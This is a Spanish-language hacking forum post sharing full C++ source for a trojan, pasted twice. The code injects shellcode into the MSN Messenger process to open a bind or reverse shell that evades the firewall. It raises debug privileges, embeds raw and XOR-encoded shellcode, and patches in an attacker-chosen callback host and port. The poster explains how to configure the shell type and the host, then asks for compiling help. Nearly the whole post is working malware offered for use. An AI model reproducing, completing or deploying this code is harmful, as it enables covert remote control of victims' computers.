Autor
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=18108
respecto de ¨DLL INJECTION¨ para evitar el cortafuego, encontre en la web, este codigo de un troyano, que teoricamente realizaria una dll injection, y abriria un puerto sin q el firewall se entere, bajo la tecnica de hacerle creer que quien lo hace es un proceso autorizado, por ejemplo el MSN.
Código:
// Akiles.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h> //libreria para procesos
#pragma comment(lib, "ws2_32.lib")
const DWORD MAXINJECTSIZE = 4096;
unsigned int Port = 63000;
char *Host = "localhost";
typedef hostent *(__stdcall *PGetHostByName)(const char*);
typedef int (__stdcall *PWSAStartup)(WORD,LPWSADATA);
unsigned char DShell[] =
"\x43\x43\x43\x43\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01"
"\xea\x52\x8b\x52\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01"
"\xee\x31\xff\xc1\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75"
"\xea\x5a\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb"
"\x8b\x04\x8b\x01\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30"
"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c"
"\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8"
"\xfe\xe8\x90\xff\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff"
"\x54\x31\xc0\xfe\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff"
"\xff\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79"//164
"\xe8\x61\xff\xff\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x00\x00"//165//\x70\xcc port 28876
"\xfe\xcc\x50\x89\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8"
"\x42\xff\xff\xff\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff"
"\xff\xff\x58\x60\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23"
"\xff\xff\xff\x89\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41"
"\x31\xdb\x56\x56\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53"
"\x53\x53\x53\x53\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54"
"\x50\x53\x53\x53\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0"
"\x05\xd0\xe8\xdf\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb"
"\x8d\x5f\xe8\xcf\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8"
"\xc2\xfe\xff\xff\x83\xc4\x5c\x61\xeb\x89";
//rebienta proceso
char RShell[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
struct Data
{
WSADATA wsaData;
sockaddr_in Sin;
WORD MakeWord;
PGetHostByName pFuncGetHostByName;
PWSAStartup pFuncWSAStartup;
hostent *hServ;
char Host[100];
};
int GetProcessId(char *Name)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
char ProcessID[10]="";
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
return 0;
}
// Set the size of the structure before using it.
pe32.dwSize = sizeof( PROCESSENTRY32 );
// Retrieve information about the first process,
// and exit if unsuccessful
if( !Process32First( hProcessSnap, &pe32 ) )
{
//printError( "Process32First" ); // Show cause of failure
CloseHandle( hProcessSnap ); // Must clean up the snapshot object!
return( FALSE );
}
// Now walk the snapshot of processes, and
// display information about each process in turn
Process32Next( hProcessSnap, &pe32 );
do
{
// Retrieve the priority class.
dwPriorityClass = 0;
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
dwPriorityClass = GetPriorityClass( hProcess );
CloseHandle( hProcess );
if( dwPriorityClass )
printf( "\n Priority Class = %d", dwPriorityClass );
if(!strcmp(Name,pe32.szExeFile))
{
CloseHandle( hProcessSnap );
return pe32.th32ProcessID;
}
} while( Process32Next( hProcessSnap, &pe32 ) );
// Don't forget to clean up the snapshot object!
CloseHandle( hProcessSnap );
return 0;
}
DWORD __stdcall RemoteGetHostByName(struct Data *RData)
{
RData->pFuncWSAStartup(RData->MakeWord,&RData->wsaData);
RData->hServ= (struct hostent *)RData->pFuncGetHostByName(RData->Host);
RData->Sin.sin_addr = *((struct in_addr *)RData->hServ->h_addr);
return 1;
}
bool ResolucionIpInjection( HANDLE hProcess,sockaddr_in &Sin)
{
HANDLE ht = 0;
void *p = 0;
struct Data *c=0;
DWORD rc;
struct Data RData;
::ZeroMemory( &RData, sizeof(struct Data));
RData.pFuncGetHostByName = (PGetHostByName)GetProcAddress(LoadLibrary("wsock32.dll"), "gethostbyname" );
RData.pFuncWSAStartup = (PWSAStartup)GetProcAddress(LoadLibrary("wsock32.dll"), "WSAStartup" );
RData.MakeWord = MAKEWORD(2 ,0);
strcpy(RData.Host,Host);
// reserva de memoria en proceso remoto
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
c =(struct Data *) VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( c == 0 )
goto cleanup;
// copia del proceso en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, p, &RemoteGetHostByName, MAXINJECTSIZE, 0 ) )
goto cleanup;
// copia de los parametros en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, c, &RData, MAXINJECTSIZE, 0 ) )
goto cleanup;
// ejecucion remota del proceso escrito en el area reservada
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, c, 0, &rc );
if ( ht == NULL )
goto cleanup;
rc = WaitForSingleObject( ht, INFINITE );
ReadProcessMemory(hProcess,c,&RData,sizeof(struct Data),0);
Sin = RData.Sin;
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 0;
}
bool ShellInjection( HANDLE hProcess)
{
HANDLE ht = 0;
void *p = 0;
DWORD rc;
// reserva de memoria en proceso remoto
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
// copia de la shell en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )
goto cleanup;
// ejecucion remota del proceso escrito en el area reservada
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, NULL, 0, &rc );
if ( ht == NULL )
goto cleanup;
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
return 0;
}
BOOL IsWindowsNT()
{
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi);
if( bOsVersionInfoEx == 0 )
{
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return FALSE;
}
return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
}
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
wprintf( L"OpenProcessToken() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
return;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
wprintf( L"LookupPrivilegeValue() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
wprintf( L"AdjustTokenPrivileges() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
}
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void SetShell(HANDLE hProcess)
{
char ip_addr[256];
unsigned long encoded_port = 0;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 63000;
unsigned long encoded_ip = 0;
struct sockaddr_in Sin;
//Resolucion de host a ip
ResolucionIpInjection(hProcess,Sin);
//Inicializacion puerto shell inversa
strncpy(ip_addr, Host, 20);
encoded_port = htonl(Port);
encoded_port += 2;
RShell[184] = (char) 0x90;
RShell[185] = (char) 0x92;
RShell[186] = xor_data((char)((encoded_port >> 16) & 0xff));
RShell[187] = xor_data((char)((encoded_port >> 24) & 0xff));
//Inicializacion ip shell inversa
raw_num = Sin.sin_addr.S_un.S_un_b.s_b1;
RShell[179] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b2;
RShell[180] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b3;
RShell[181] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b4;
RShell[182] = xor_data((char)raw_num);
//Inicializacion puerto shell directa
DShell[174] = (0xFF00 & Port) >> 8;
DShell[175] = 0x00FF & Port;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HANDLE hProcess;
int Pid = GetProcessId("msnmsgr.exe");
if ( !IsWindowsNT())
return 0;
EnableDebugPriv();
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, Pid);
if ( hProcess != NULL )
{
SetShell(hProcess);
ShellInjection( hProcess);
CloseHandle( hProcess );
}
else
return 0;
return 1;
}
//
#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h> //libreria para procesos
#pragma comment(lib, "ws2_32.lib")
const DWORD MAXINJECTSIZE = 4096;
unsigned int Port = 63000;
char *Host = "localhost";
typedef hostent *(__stdcall *PGetHostByName)(const char*);
typedef int (__stdcall *PWSAStartup)(WORD,LPWSADATA);
unsigned char DShell[] =
"\x43\x43\x43\x43\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01"
"\xea\x52\x8b\x52\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01"
"\xee\x31\xff\xc1\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75"
"\xea\x5a\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb"
"\x8b\x04\x8b\x01\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30"
"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c"
"\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8"
"\xfe\xe8\x90\xff\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff"
"\x54\x31\xc0\xfe\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff"
"\xff\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79"//164
"\xe8\x61\xff\xff\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x00\x00"//165//\x70\xcc port 28876
"\xfe\xcc\x50\x89\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8"
"\x42\xff\xff\xff\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff"
"\xff\xff\x58\x60\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23"
"\xff\xff\xff\x89\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41"
"\x31\xdb\x56\x56\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53"
"\x53\x53\x53\x53\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54"
"\x50\x53\x53\x53\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0"
"\x05\xd0\xe8\xdf\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb"
"\x8d\x5f\xe8\xcf\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8"
"\xc2\xfe\xff\xff\x83\xc4\x5c\x61\xeb\x89";
//rebienta proceso
char RShell[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
struct Data
{
WSADATA wsaData;
sockaddr_in Sin;
WORD MakeWord;
PGetHostByName pFuncGetHostByName;
PWSAStartup pFuncWSAStartup;
hostent *hServ;
char Host[100];
};
int GetProcessId(char *Name)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
char ProcessID[10]="";
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
return 0;
}
// Set the size of the structure before using it.
pe32.dwSize = sizeof( PROCESSENTRY32 );
// Retrieve information about the first process,
// and exit if unsuccessful
if( !Process32First( hProcessSnap, &pe32 ) )
{
//printError( "Process32First" ); // Show cause of failure
CloseHandle( hProcessSnap ); // Must clean up the snapshot object!
return( FALSE );
}
// Now walk the snapshot of processes, and
// display information about each process in turn
Process32Next( hProcessSnap, &pe32 );
do
{
// Retrieve the priority class.
dwPriorityClass = 0;
hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
dwPriorityClass = GetPriorityClass( hProcess );
CloseHandle( hProcess );
if( dwPriorityClass )
printf( "\n Priority Class = %d", dwPriorityClass );
if(!strcmp(Name,pe32.szExeFile))
{
CloseHandle( hProcessSnap );
return pe32.th32ProcessID;
}
} while( Process32Next( hProcessSnap, &pe32 ) );
// Don't forget to clean up the snapshot object!
CloseHandle( hProcessSnap );
return 0;
}
DWORD __stdcall RemoteGetHostByName(struct Data *RData)
{
RData->pFuncWSAStartup(RData->MakeWord,&RData->wsaData);
RData->hServ= (struct hostent *)RData->pFuncGetHostByName(RData->Host);
RData->Sin.sin_addr = *((struct in_addr *)RData->hServ->h_addr);
return 1;
}
bool ResolucionIpInjection( HANDLE hProcess,sockaddr_in &Sin)
{
HANDLE ht = 0;
void *p = 0;
struct Data *c=0;
DWORD rc;
struct Data RData;
::ZeroMemory( &RData, sizeof(struct Data));
RData.pFuncGetHostByName = (PGetHostByName)GetProcAddress(LoadLibrary("wsock32.dll"), "gethostbyname" );
RData.pFuncWSAStartup = (PWSAStartup)GetProcAddress(LoadLibrary("wsock32.dll"), "WSAStartup" );
RData.MakeWord = MAKEWORD(2 ,0);
strcpy(RData.Host,Host);
// reserva de memoria en proceso remoto
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
c =(struct Data *) VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( c == 0 )
goto cleanup;
// copia del proceso en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, p, &RemoteGetHostByName, MAXINJECTSIZE, 0 ) )
goto cleanup;
// copia de los parametros en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, c, &RData, MAXINJECTSIZE, 0 ) )
goto cleanup;
// ejecucion remota del proceso escrito en el area reservada
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, c, 0, &rc );
if ( ht == NULL )
goto cleanup;
rc = WaitForSingleObject( ht, INFINITE );
ReadProcessMemory(hProcess,c,&RData,sizeof(struct Data),0);
Sin = RData.Sin;
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
if ( c != 0 )
VirtualFreeEx( hProcess, c, 0, MEM_RELEASE );
return 0;
}
bool ShellInjection( HANDLE hProcess)
{
HANDLE ht = 0;
void *p = 0;
DWORD rc;
// reserva de memoria en proceso remoto
p = VirtualAllocEx( hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( p == 0 )
goto cleanup;
// copia de la shell en el area de memoria reservada
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )
goto cleanup;
// ejecucion remota del proceso escrito en el area reservada
ht = CreateRemoteThread( hProcess, 0, 0, (DWORD (__stdcall *)( void *)) p, NULL, 0, &rc );
if ( ht == NULL )
goto cleanup;
return 1;
cleanup:
CloseHandle( ht );
// Let's clean
if ( p != 0 )
VirtualFreeEx( hProcess, p, 0, MEM_RELEASE );
return 0;
}
BOOL IsWindowsNT()
{
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi);
if( bOsVersionInfoEx == 0 )
{
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return FALSE;
}
return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT;
}
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
wprintf( L"OpenProcessToken() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
return;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
wprintf( L"LookupPrivilegeValue() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
wprintf( L"AdjustTokenPrivileges() failed, Error = %d SeDebugPrivilege is not available.\n", GetLastError() );
CloseHandle( hToken );
}
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void SetShell(HANDLE hProcess)
{
char ip_addr[256];
unsigned long encoded_port = 0;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 63000;
unsigned long encoded_ip = 0;
struct sockaddr_in Sin;
//Resolucion de host a ip
ResolucionIpInjection(hProcess,Sin);
//Inicializacion puerto shell inversa
strncpy(ip_addr, Host, 20);
encoded_port = htonl(Port);
encoded_port += 2;
RShell[184] = (char) 0x90;
RShell[185] = (char) 0x92;
RShell[186] = xor_data((char)((encoded_port >> 16) & 0xff));
RShell[187] = xor_data((char)((encoded_port >> 24) & 0xff));
//Inicializacion ip shell inversa
raw_num = Sin.sin_addr.S_un.S_un_b.s_b1;
RShell[179] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b2;
RShell[180] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b3;
RShell[181] = xor_data((char)raw_num);
raw_num = Sin.sin_addr.S_un.S_un_b.s_b4;
RShell[182] = xor_data((char)raw_num);
//Inicializacion puerto shell directa
DShell[174] = (0xFF00 & Port) >> 8;
DShell[175] = 0x00FF & Port;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
HANDLE hProcess;
int Pid = GetProcessId("msnmsgr.exe");
if ( !IsWindowsNT())
return 0;
EnableDebugPriv();
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, Pid);
if ( hProcess != NULL )
{
SetShell(hProcess);
ShellInjection( hProcess);
CloseHandle( hProcess );
}
else
return 0;
return 1;
}
El programa puede ser una shell directa o inversa debiendose editar esta linea
Shell Directa:
if ( ! WriteProcessMemory( hProcess, p, &DShell, MAXINJECTSIZE, 0 ) )goto cleanup; [/b]
Shell reversa:
if ( ! WriteProcessMemory( hProcess, p, &RShell, MAXINJECTSIZE, 0 ) )goto cleanup;
El puerto y la ip se edita en las variables, en ip se podria colocar un host y el hace la resolucion a ip "muy util para los que tienen ip dinamica"
unsigned int Port = 63000;
char *Host = "localhost";
Fuente: cyruxNET
ahora bien al intentar compilarlo con Visual Studia 6.0 C++ me da error en la libreria 'stdafx.h'. Busque en la web, y me aparecen varias distintas. Q debo hacer? si alguien desea probar el programilla y postear avances bienvenido sea.
Salu2
En línea
